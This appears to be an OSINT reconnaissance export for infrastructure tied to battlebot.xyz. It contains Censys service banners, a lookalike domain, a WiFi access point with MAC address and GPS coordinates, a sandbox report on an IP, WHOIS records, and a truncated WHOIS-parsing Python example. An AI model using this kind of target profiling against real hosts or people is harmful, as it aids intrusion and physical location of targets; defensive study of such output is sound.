"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Linktree (Category: social)
https://linktr.ee/Altpapier | Altpapier |
| 2023-05-12 02:44:45 | Similar Domain | Yes | Similar Domain Finder | 1 | 0 | 1 | 0 | None | battlebot.xyz | battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ProCare-Staff (Net ID: 00:01:21:1C:31:01) | 37.7813933,-122.3918002 |
| 2023-05-12 02:48:08 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 20, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://185.199.110.153/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:4892:304:WilStaging_02"\n "Local\\SM0:4892:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:4892:120:WilError_01"\n "Local\\SM0:4892:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "138.91.254.96:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-3', u'name': u'Tries to GET non-existent files from a webserver', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"GET / HTTP/1.1\nHost: 185.199.110.153\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.56\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "githubstatus.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, 
Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\crashpad\\settings.dat"\n "msedge.exe" writes file 
"\\device\\namedpipe\\wkssvc"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\variations"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\last version"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens-journal"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\vpn tokens"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines 
with CRLF line terminators"- Location: [%TEMP%\\2988_1083578063\\shopping.js]- [targetUID: 00000000-00002988]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00002988]\n "wallet-pre-stable.json" has type "ASCII text"- [targetUID: N/A]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%TEMP%\\2988_1618861475\\edge_driver.js]- [targetUID: 00000000-00002988]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2988_1083578063\\edge_driver.js]- [targetUID: 00000000-00002988]\n "wallet.bundle.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\2988_35760083\\Filtering Rules]- [targetUID: 00000000-00002988]\n "vendor.bundle.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_1]- [targetUID: 00000000-00002988]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2988_1618861475\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00002988]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2988_1083578063\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00002988]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2988_1083578063\\product_page.js]- [targetUID: 00000000-00002988]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2988_1083578063\\edge_checkout_page_validator.js]- [targetUID: 00000000-00002988]\n "auto_open_controller.js" 
has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\2988_1083578063\\auto_open_controller.js]- [targetUID: 00000000-00002988]\n "bnpl.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%TEMP%\\2988_1618861475\\bnpl\\bnpl.bundle.js]- [targetUID: 00000000-00002988]\n "tokenized-card.bundle.js" has | 185.199.110.153 |
| 2023-05-12 03:08:42 | Affiliate - IP Address | No | DNS Look-aside | 0 | 0 | 3 | 0 | None | 64.226.81.33 | 64.226.81.43 |
| 2023-05-12 02:45:46 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:50c0:8003::153 |
| 2023-05-12 02:53:45 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8002::153:443 | 2606:50c0:8002::153 |
| 2023-05-12 03:12:15 | Affiliate - Domain Whois | No | Whois | 6 | 0 | 6 | 0 | None | Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2023-04-28T07:41:04Z
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32256
Registrant Country: US
Registrant Phone: +1.5707088622
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32256
Admin Country: US
Admin Phone: +1.5707088622
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: c26pf75p2tc@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 5335 Gate Parkway care of Network Solutions PO Box 459
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32256
Tech Country: US
Tech Phone: +1.5707088622
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Registrar Abuse Contact Email: domain.operations@web.com
Registrar Abuse Contact Phone: +1.8777228662
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en
This listing is a Network Solutions Private Registration. Mail
correspondence to this address must be sent via USPS Express Mail(TM) or
USPS Certified Mail(R); all other mail will not be processed. Be sure to
include the registrant's domain name in the address.
The data in Networksolutions.com's WHOIS database is provided to you by
Networksolutions.com for information purposes only, that is, to assist you in
obtaining information about or related to a domain name registration
record. Networksolutions.com makes this information available "as is," and
does not guarantee its accuracy. By submitting a WHOIS query, you
agree that you will use this data only for lawful purposes and that,
under no circumstances will you use this data to: (1) allow, enable,
or otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via direct mail, electronic mail, or by
telephone; or (2) enable high volume, automated, electronic processes
that apply to Networksolutions.com (or its systems). The compilation,
repackaging, dissemination or other use of this data is expressly
prohibited without the prior written consent of Networksolutions.com.
Networksolutions.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
| ondigitalocean.com |
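The WHOIS cell above carries two records for the same name, the VeriSign registry record and the Network Solutions registrar record, and the fields an analyst actually pivots on (domain age, transfer lock, privacy proxy, DNS operator, registry vs registrar expiry) are buried between status lines and terms-of-use text. The following is an added example, not SpiderFoot or module code: a small parser for that key/value format that stops at the `>>> Last update` marker, tolerates repeated keys, and derives those fields. The two sample records are copied from the ondigitalocean.com entry above, trimmed to their key/value lines; the privacy-service markers are a heuristic of this example.

```python
"""Parse the registry and registrar WHOIS records for ondigitalocean.com
shown above and derive the fields an analyst pivots on.  Added example,
not SpiderFoot code; sample text copied from the record on this page."""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timezone

REGISTRY_RECORD = """\
Domain Name: ONDIGITALOCEAN.COM
Registry Domain ID: 2280019987_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Updated Date: 2023-04-28T07:40:26Z
Creation Date: 2018-06-27T20:51:35Z
Registry Expiry Date: 2024-06-27T20:51:35Z
Registrar: Network Solutions, LLC
Registrar IANA ID: 2
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire.
"""

REGISTRAR_RECORD = """\
Domain Name: ONDIGITALOCEAN.COM
Creation Date: 2018-06-27T20:51:35Z
Registrar Registration Expiration Date: 2024-06-27T04:00:00Z
Registrar: Network Solutions, LLC
Reseller:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Email: c26pf75p2tc@networksolutionsprivateregistration.com
Name Server: KIM.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
>>> Last update of WHOIS database: 2023-05-12T03:12:15Z <<<
"""

KV_RE = re.compile(r"^([A-Za-z][A-Za-z0-9 /\-]*?):\s*(.*)$")
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
# Heuristic markers for a privacy/proxy registrant (assumption of this example).
PRIVACY_MARKERS = ("privacy", "proxy", "redacted", "privateregistration")


def parse_whois(text: str) -> dict[str, list[str]]:
    """Key/value lines become lists (keys such as Name Server repeat).
    Parsing stops at the '>>> Last update' marker, after which only notices
    and terms-of-use follow; empty fields such as 'Reseller:' are dropped."""
    rec: dict[str, list[str]] = defaultdict(list)
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(">>>"):
            m = re.search(r"\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z", line)
            if m:
                rec["_last_update"].append(m.group(0))
            break
        m = KV_RE.match(line)
        if m and m.group(2):
            rec[m.group(1)].append(m.group(2))
    return dict(rec)


def first(rec: dict[str, list[str]], key: str) -> str | None:
    vals = rec.get(key)
    return vals[0] if vals else None


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, TS_FMT).replace(tzinfo=timezone.utc)


def domain_age_days(rec, as_of: datetime | None = None) -> int:
    """Age at the moment the record was pulled (the '>>> Last update' stamp)
    unless an explicit reference time is supplied."""
    if as_of is None:
        as_of = parse_ts(first(rec, "_last_update"))
    return (as_of - parse_ts(first(rec, "Creation Date"))).days


def is_transfer_locked(rec) -> bool:
    return any(s.split()[0] in ("clientTransferProhibited", "serverTransferProhibited")
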